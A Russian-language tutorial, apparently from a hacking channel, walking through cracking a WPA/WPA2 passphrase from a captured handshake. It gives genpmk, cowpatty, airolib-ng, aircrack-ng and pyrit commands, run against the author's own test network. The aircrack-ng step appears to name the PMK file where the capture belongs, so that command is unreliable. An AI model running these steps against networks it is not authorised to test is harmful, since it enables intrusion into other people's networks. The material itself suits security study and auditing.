Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 2

Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 2

@HackersTime

Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 2

В предыдущей статье было рассказано, как перехватить handshake и подобрать парольную фразу + мы поговорили о теории, что не мало важно! Это был простой пример. Теперь же, давайте немного усложним задачу. Усложним задачу только тем, что в этой статье мы познакомимся с такими программами как: genpmk, cowpatty, airolib-ng и pyrit. И научимся их использовать.

Итак, у нас есть handshake и мы можем приступать к “новому” материалу.


genpmk & cowpatty

Прежде чем начинать, еще раз напомню, что нам нужен словарь, в котором должна находиться парольная фраза. В моем случае это “helloitismypass“.

Для быстрого взлома мы можем заранее рассчитать (pre-calculate) PMK для конкретной SSID. Следующая команда создаст файл PMK-Wireless, который будет содержать предварительно сгенерированный (pre-generated) PMK:

1 | # genpmk -f mypass.lst -d PMK-Wireless -s TestWireless
  • -f – путь к словарю
  • -d – PMK-файл
  • -s – название (SSID) точки доступа (AP)

 

PMK-файл создан, теперь будем использовать cowpatty для взлома WPA пароля.

Для справки: эксперимент проводил на BackTrack 5 R3, в котором предустановленна cowpatty v4.6. Так вот, если задать команду:

1 | # cowpatty -d PMK-Wireless -r handshaketest-01.cap -s TestWireless

…выдается ошибка “end of pcap capture file incomplete four-way handshake exchange“.

Решение было найдено здесь. В котором сказано, что нужно добавить опцию -2, после чего все будет работать нормально:

1 | # cowpatty -2 -d PMK-Wireless -r handshaketest-01.cap -s TestWireless
  • -d – созданный PMK-файл (см. команду genpmk)
  • -r – “захваченный” handshake
  • -s – название (SSID) точки доступа (AP)

Пароль получен! Обратите внимание за какое время cowpatty подобрал пароль = 0.32 секунды.

airolib-ng & aircrack-ng

Теперь тоже самое, но с другими программами.

Для того чтобы использовать PMK-файл с aircrack-ng, нам нужно воспользоваться программой airolib-ng. Для этого зададим след. команду:

1 | # airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless
  • PMK-Aircrack – база данных, совместимая для работы с aircrack-ng
  • PMK-Wireless – PMK-файл, который мы создали с помощью genpmk

“Скормим” созданную БД (PMK-Aircrack) aircrack-ng. После чего процесс взлома будет существенно выше:

1 | # aircrack-ng -r PMK-Aircrack PMK-Wireless
  • -r – база данных, совместимая для работы с aircrack-ng
  • PMK-Wireless – PMK-файл, который мы создали с помощью genpmk

Готово.

Pyrit

Pyrit может использовать многопроцессорные системы (multi-CPU) для быстрого взлома. Более подробную информацию ищите на официальном сайте.

1 | # pyrit -r handshaketest-01.cap -i PMK-Wireless attack_cowpatty

 

Вот и все! Ничего сложного.


Report Page